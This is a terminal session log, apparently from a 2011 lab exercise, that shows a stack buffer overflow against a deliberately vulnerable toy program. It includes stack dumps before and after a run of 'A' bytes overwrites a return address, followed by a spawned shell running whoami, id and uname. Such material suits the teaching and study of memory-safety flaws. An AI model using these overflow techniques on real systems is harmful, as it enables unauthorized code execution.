Script started on Fri 18 Feb 2011 01:24:18 AM PST
In shell
i = 2; inputs = 0xbfee7db4
After cond
&main = 0x80486ec
&shell = 0x804868b
&inputs[0] = 0xbfee7db4
&buf[0] = 0xbfee7cb4
BEFORE picture of stack
0xbfee7cac: 0xe5
0xbfee7cad: 0x86
0xbfee7cae: 0x4
0xbfee7caf: 0x8
0xbfee7cb0: 0x2
0xbfee7cb1: 0x0
0xbfee7cb2: 0x0
0xbfee7cb3: 0x0
0xbfee7cb4: 0x0
0xbfee7cb5: 0x0
0xbfee7cb6: 0x0
0xbfee7cb7: 0x0
0xbfee7cb8: 0x0
0xbfee7cb9: 0x0
0xbfee7cba: 0x0
0xbfee7cbb: 0x0
0xbfee7cbc: 0x0
0xbfee7cbd: 0x0
0xbfee7cbe: 0x0
0xbfee7cbf: 0x0
0xbfee7cc0: 0xf4
0xbfee7cc1: 0x1f
0xbfee7cc2: 0x70
0xbfee7cc3: 0xb7
0xbfee7cc4: 0xf4
0xbfee7cc5: 0x1f
0xbfee7cc6: 0x70
0xbfee7cc7: 0xb7
0xbfee7cc8: 0x8
0xbfee7cc9: 0x7d
0xbfee7cca: 0xee
0xbfee7ccb: 0xbf
0xbfee7ccc: 0x31
0xbfee7ccd: 0x87
0xbfee7cce: 0x4
0xbfee7ccf: 0x8
0xbfee7cd0: 0x2
0xbfee7cd1: 0x0
0xbfee7cd2: 0x0
0xbfee7cd3: 0x0
0xbfee7cd4: 0xb4
0xbfee7cd5: 0x7d
0xbfee7cd6: 0xee
0xbfee7cd7: 0xbf
i = 1; tmp= 2; ct = 2; &tmp = 0xbfee7cb0
AFTER iteration 1
0xbfee7cac: 0xe5
0xbfee7cad: 0x86
0xbfee7cae: 0x4
0xbfee7caf: 0x8
0xbfee7cb0: 0x2
0xbfee7cb1: 0x0
0xbfee7cb2: 0x0
0xbfee7cb3: 0x0
0xbfee7cb4: 0x41
0xbfee7cb5: 0x41
0xbfee7cb6: 0x41
0xbfee7cb7: 0x41
0xbfee7cb8: 0x41
0xbfee7cb9: 0x41
0xbfee7cba: 0x41
0xbfee7cbb: 0x41
0xbfee7cbc: 0x41
0xbfee7cbd: 0x41
0xbfee7cbe: 0x41
0xbfee7cbf: 0x41
0xbfee7cc0: 0x41
0xbfee7cc1: 0x41
0xbfee7cc2: 0x41
0xbfee7cc3: 0x41
0xbfee7cc4: 0x41
0xbfee7cc5: 0x41
0xbfee7cc6: 0x41
0xbfee7cc7: 0x41
0xbfee7cc8: 0x41
0xbfee7cc9: 0x41
0xbfee7cca: 0x41
0xbfee7ccb: 0x41
0xbfee7ccc: 0x2
0xbfee7ccd: 0x87
0xbfee7cce: 0x4
0xbfee7ccf: 0x8
0xbfee7cd0: 0x0
0xbfee7cd1: 0x0
0xbfee7cd2: 0x0
0xbfee7cd3: 0x0
0xbfee7cd4: 0xb4
0xbfee7cd5: 0x7d
0xbfee7cd6: 0xee
0xbfee7cd7: 0xbf
buf = AAAAAAAAAAAAAAAAAAAAAAAA‡
victim: 0x80484b4
In shell
i = 0; inputs = 0xbfee7db4
Inside here
$ whoami
pletcher
$ id
uid=1000(pletcher) gid=1000(pletcher) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(pletcher)
$ hostname
pletcher
$ uname -a
Linux pletcher 2.6.32-28-generic-pae #55-Ubuntu SMP Mon Jan 10 22:34:08 UTC 2011 i686 GNU/Linux
$ 
After cond
Segmentation fault

Script done on Fri 18 Feb 2011 01:24:32 AM PST
